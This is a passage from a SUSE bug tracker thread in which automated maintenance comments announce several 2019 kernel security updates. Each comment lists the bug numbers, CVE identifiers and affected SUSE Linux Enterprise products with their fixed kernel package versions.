Comment 23 Swamp Workflow Management 2019-09-20 19:18:37 UTC
SUSE-SU-2019:2424-1: An update that solves 40 vulnerabilities and has 222 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1078248,1082555,1082635,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1103990,1104353,1104427,1104745,1104902,1106061,1106284,1106434,1108382,1109837,1111666,1112178,1112374,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1113994,1114279,1114542,1118689,1119086,1119113,1120046,1120876,1120902,1123105,1123959,1124370,1129424,1129519,1129664,1131107,1131281,1131489,1131565,1133021,1134291,1134476,1134881,1134882,1135219,1135642,1135897,1135990,1136039,1136261,1136346,1136349,1136352,1136496,1136498,1136502,1136682,1137322,1137323,1137884,1138099,1138100,1138539,1139020,1139021,1139101,1139500,1140012,1140426,1140487,1141340,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143331,1143466,1143706,1143738,1143765,1143841,1143843,1143962,1144123,1144333,1144375,1144474,1144518,1144582,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145018,1145051,1145059,1145189,1145235,1145256,1145300,1145302,1145357,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145446,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1145946,1146074,1146084,1146141,1146163,1146215,1146285,1146346,1146351,1146352,1146361,1146368,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146516,1146519,1146524,1146526,1146529,1146531,1146543,1146547,1146550,1146575,1146589,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148219,1148297,1148303,1148308,1148363,1148379,1148394,1148527,1148570,1148574,1148616,1148617,1148619,1148698,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149325,1149376,1149413,1149418,1149424,1149522,1149527,1149539,1149552,1149591,1149602,1149612,1149626,1149652,1149713,1149940,1149976,1150025,1150033,1150112,1150562,1150727,1150860,1150861,1150933
CVE References: CVE-2017-18551,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15099,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Workstation Extension 15-SP1 (src):    kernel-default-4.12.14-197.18.1
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src):    dtb-aarch64-4.12.14-197.18.1, kernel-debug-4.12.14-197.18.1, kernel-default-4.12.14-197.18.1, kernel-docs-4.12.14-197.18.1, kernel-kvmsmall-4.12.14-197.18.1, kernel-obs-qa-4.12.14-197.18.1, kernel-source-4.12.14-197.18.1, kernel-vanilla-4.12.14-197.18.1, kernel-zfcpdump-4.12.14-197.18.1
SUSE Linux Enterprise Module for Legacy Software 15-SP1 (src):    kernel-default-4.12.14-197.18.1
SUSE Linux Enterprise Module for Development Tools 15-SP1 (src):    kernel-docs-4.12.14-197.18.1, kernel-obs-build-4.12.14-197.18.1, kernel-source-4.12.14-197.18.1, kernel-syms-4.12.14-197.18.1
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src):    kernel-default-4.12.14-197.18.1, kernel-source-4.12.14-197.18.1, kernel-zfcpdump-4.12.14-197.18.1
SUSE Linux Enterprise High Availability 15-SP1 (src):    kernel-default-4.12.14-197.18.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 26 Swamp Workflow Management 2019-10-14 19:20:41 UTC
SUSE-SU-2019:2658-1: An update that solves 45 vulnerabilities and has 270 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1071995,1078248,1082555,1082635,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1103990,1104353,1104427,1104745,1104902,1104967,1106061,1106284,1106434,1108382,1109158,1109837,1111666,1112178,1112374,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1113994,1114279,1114542,1118689,1119086,1119113,1120046,1120876,1120902,1123034,1123105,1123959,1124370,1127988,1129424,1129519,1129664,1131107,1131281,1131304,1131489,1131565,1132686,1133021,1134291,1134476,1134881,1134882,1135219,1135642,1135897,1135990,1136039,1136261,1136346,1136349,1136352,1136496,1136498,1136502,1136682,1137069,1137322,1137323,1137586,1137865,1137884,1137959,1137982,1138099,1138100,1138539,1139020,1139021,1139101,1139500,1140012,1140155,1140426,1140487,1141013,1141340,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143331,1143466,1143706,1143738,1143765,1143841,1143843,1143962,1144123,1144333,1144375,1144474,1144518,1144582,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145018,1145051,1145059,1145134,1145189,1145235,1145256,1145300,1145302,1145357,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145446,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1145946,1146042,1146074,1146084,1146141,1146163,1146215,1146285,1146346,1146351,1146352,1146361,1146368,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146531,1146540,1146543,1146547,1146550,1146575,1146589,1146664,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148219,1148297,1148303,1148308,1148363,1148379,1148394,1148527,1148570,1148574,1148616,1148617,1148619,1148698,1148712,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149313,1149325,1149376,1149413,1149418,1149424,1149446,1149522,1149527,1149539,1149552,1149555,1149591,1149602,1149612,1149626,1149651,1149652,1149713,1149940,1149976,1150025,1150033,1150112,1150305,1150381,1150423,1150562,1150727,1150846,1150860,1150861,1150933,1151067,1151192,1151350,1151610,1151661,1151662,1151667,1151680,1151891,1151955,1152024,1152025,1152026,1152161,1152187,1152243,1152325,1152457,1152460,1152466,1152525,1152972,1152974,1152975
CVE References: CVE-2017-18551,CVE-2017-18595,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-11477,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14821,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15099,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15291,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Module for Public Cloud 15-SP1 (src):    kernel-azure-4.12.14-8.16.1, kernel-source-azure-4.12.14-8.16.1, kernel-syms-azure-4.12.14-8.16.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 28 Swamp Workflow Management 2019-10-22 16:20:15 UTC
SUSE-SU-2019:2738-1: An update that solves 40 vulnerabilities and has 225 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1078248,1082555,1082635,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1103990,1104353,1104427,1104745,1104902,1106061,1106284,1106434,1108382,1109837,1111666,1112178,1112374,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1113994,1114279,1114542,1118689,1119086,1119113,1120046,1120876,1120902,1123105,1123959,1124370,1129424,1129519,1129664,1131107,1131281,1131489,1131565,1132426,1133021,1134291,1134476,1134881,1134882,1135219,1135642,1135897,1135990,1136039,1136261,1136346,1136349,1136352,1136496,1136498,1136502,1136682,1137322,1137323,1137884,1138099,1138100,1138539,1139020,1139021,1139101,1139500,1140012,1140426,1140487,1141340,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143331,1143466,1143706,1143738,1143765,1143841,1143843,1143962,1144123,1144333,1144375,1144474,1144518,1144582,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145018,1145051,1145059,1145189,1145235,1145256,1145300,1145302,1145357,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145446,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1145946,1146074,1146084,1146141,1146163,1146215,1146285,1146346,1146351,1146352,1146361,1146368,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146531,1146543,1146547,1146550,1146575,1146589,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148219,1148297,1148303,1148308,1148363,1148379,1148394,1148527,1148570,1148574,1148616,1148617,1148619,1148698,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149325,1149376,1149413,1149418,1149424,1149522,1149527,1149539,1149552,1149591,1149602,1149612,1149626,1149652,1149713,1149940,1149976,1150025,1150033,1150112,1150562,1150727,1150860,1150861,1150933
CVE References: CVE-2017-18551,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15099,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Module for Realtime 15-SP1 (src):    kernel-rt-4.12.14-14.11.1, kernel-rt_debug-4.12.14-14.11.1, kernel-source-rt-4.12.14-14.11.1, kernel-syms-rt-4.12.14-14.11.1
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src):    kernel-rt-4.12.14-14.11.1, kernel-rt_debug-4.12.14-14.11.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 29 Swamp Workflow Management 2019-10-23 19:23:53 UTC
SUSE-SU-2019:2756-1: An update that solves 44 vulnerabilities and has 368 fixes is now available.

Category: security (important)
Bug References: 1012382,1047238,1050911,1051510,1053043,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1071995,1078248,1082555,1083647,1083710,1085030,1085536,1085539,1086103,1087092,1088047,1090734,1091171,1093205,1094555,1098633,1102097,1102247,1104902,1104967,1106061,1106284,1106383,1106434,1106751,1108382,1109137,1109158,1111666,1112178,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1114279,1114542,1115688,1117158,1118139,1118689,1119086,1119222,1119532,1120423,1120566,1120876,1120902,1120937,1123034,1123080,1123105,1123959,1124167,1124370,1124503,1127034,1127155,1127315,1127988,1128432,1128902,1128910,1129424,1129519,1129664,1129770,1130972,1131107,1131281,1131304,1131565,1132154,1132390,1132686,1133021,1133401,1134097,1134291,1134303,1134390,1134671,1134881,1134882,1135219,1135296,1135335,1135556,1135642,1135661,1135897,1136157,1136261,1136811,1136896,1136935,1136990,1137069,1137162,1137221,1137366,1137372,1137429,1137444,1137458,1137534,1137535,1137584,1137586,1137609,1137625,1137728,1137739,1137752,1137811,1137827,1137865,1137884,1137959,1137995,1137996,1137998,1137999,1138000,1138002,1138003,1138005,1138006,1138007,1138008,1138009,1138010,1138011,1138012,1138013,1138014,1138015,1138016,1138017,1138018,1138019,1138374,1138375,1138539,1138589,1138719,1139020,1139021,1139101,1139500,1139771,1139782,1139865,1140012,1140133,1140139,1140155,1140322,1140328,1140405,1140424,1140426,1140428,1140487,1140637,1140652,1140658,1140715,1140719,1140726,1140727,1140728,1140814,1140887,1140888,1140889,1140891,1140893,1140903,1140945,1140948,1140954,1140955,1140956,1140957,1140958,1140959,1140960,1140961,1140962,1140964,1140971,1140972,1140992,1141013,1141401,1141402,1141450,1141452,1141453,1141454,1141478,1141543,1141554,1142019,1142076,1142109,1142112,1142117,1142118,1142119,1142129,1142220,1142221,1142350,1142351,1142354,1142359,1142450,1142496,1142541,1142635,1142685,1142701,1142857,1142868,1143003,1143105,1143185,1143300,1143466,1143507,1143765,1143841,1143843,1144123,1144333,1144474,1144518,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145024,1145051,1145059,1145189,1145235,1145300,1145302,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1146042,1146074,1146084,1146163,1146285,1146346,1146351,1146352,1146361,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146531,1146540,1146543,1146547,1146550,1146575,1146589,1146664,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148303,1148363,1148379,1148394,1148527,1148574,1148616,1148617,1148619,1148698,1148712,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149313,1149325,1149376,1149413,1149418,1149424,1149446,1149522,1149527,1149539,1149552,1149555,1149591,1149602,1149612,1149626,1149651,1149652,1149713,1149940,1149959,1149963,1149976,1150025,1150033,1150112,1150381,1150423,1150562,1150727,1150860,1150861,1150933,1151350,1151610,1151667,1151671,1151891,1151955,1152024,1152025,1152026,1152161,1152325,1152457,1152460,1152466,1152972,1152974,1152975
CVE References: CVE-2017-18551,CVE-2017-18595,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-11479,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14821,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15291,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP4 (src):    kernel-rt-4.12.14-8.6.1, kernel-rt_debug-4.12.14-8.6.1, kernel-source-rt-4.12.14-8.6.1, kernel-syms-rt-4.12.14-8.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 31 Swamp Workflow Management 2019-11-13 01:34:20 UTC
SUSE-SU-2019:2950-1: An update that solves 40 vulnerabilities and has 9 fixes is now available.

Category: security (important)
Bug References: 1117665,1123959,1137586,1137865,1137944,1139073,1139751,1142857,1144903,1145477,1145922,1146042,1146163,1146285,1146361,1146378,1146391,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146540,1146543,1146547,1146584,1146612,1147122,1148938,1149376,1149522,1149527,1149555,1150025,1150112,1150452,1150457,1150465,1151347,1151350,1152782,1152788,1153119,1155671,999278
CVE References: CVE-2016-10906,CVE-2017-18509,CVE-2017-18551,CVE-2017-18595,CVE-2018-12207,CVE-2018-20976,CVE-2019-10207,CVE-2019-10220,CVE-2019-11135,CVE-2019-11477,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14821,CVE-2019-14835,CVE-2019-15098,CVE-2019-15118,CVE-2019-15212,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15290,CVE-2019-15291,CVE-2019-15505,CVE-2019-15807,CVE-2019-15902,CVE-2019-15926,CVE-2019-15927,CVE-2019-16232,CVE-2019-16233,CVE-2019-16234,CVE-2019-16413,CVE-2019-17055,CVE-2019-17056,CVE-2019-9456,CVE-2019-9506
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    kernel-default-3.12.74-60.64.124.1, kernel-source-3.12.74-60.64.124.1, kernel-syms-3.12.74-60.64.124.1, kernel-xen-3.12.74-60.64.124.1, kgraft-patch-SLE12-SP1_Update_37-1-2.3.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    kernel-default-3.12.74-60.64.124.1, kernel-source-3.12.74-60.64.124.1, kernel-syms-3.12.74-60.64.124.1, kernel-xen-3.12.74-60.64.124.1, kgraft-patch-SLE12-SP1_Update_37-1-2.3.1
SUSE Linux Enterprise Module for Public Cloud 12 (src):    kernel-ec2-3.12.74-60.64.124.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.